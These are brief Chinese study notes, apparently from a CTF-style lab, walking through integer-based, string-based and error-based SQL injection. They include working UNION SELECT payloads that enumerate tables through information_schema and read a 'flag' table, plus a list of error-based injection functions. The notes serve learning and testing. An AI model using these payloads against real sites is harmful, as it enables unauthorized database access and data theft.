整型注入
判断页面是否正常,1=1和1=2是俩个页面
在判断字段数
开始测试回显位置
获得库名
获得库的表
?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+
获得数据
?id=11 and 1=1 union select 1,concat_ws('>',flag) from flag
字符型注入
查看闭合情况
查看字段数
和整型就一样了,就是多了个闭合
获得库
获得表
?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+
获得数据
?id=-1' and 1=1 union select 1,concat_ws('>',flag) from flag--+
报错注入
常见报错函数
extractvalue()
updatexml()
floor()
exp()
geometrycollection()
multipoint()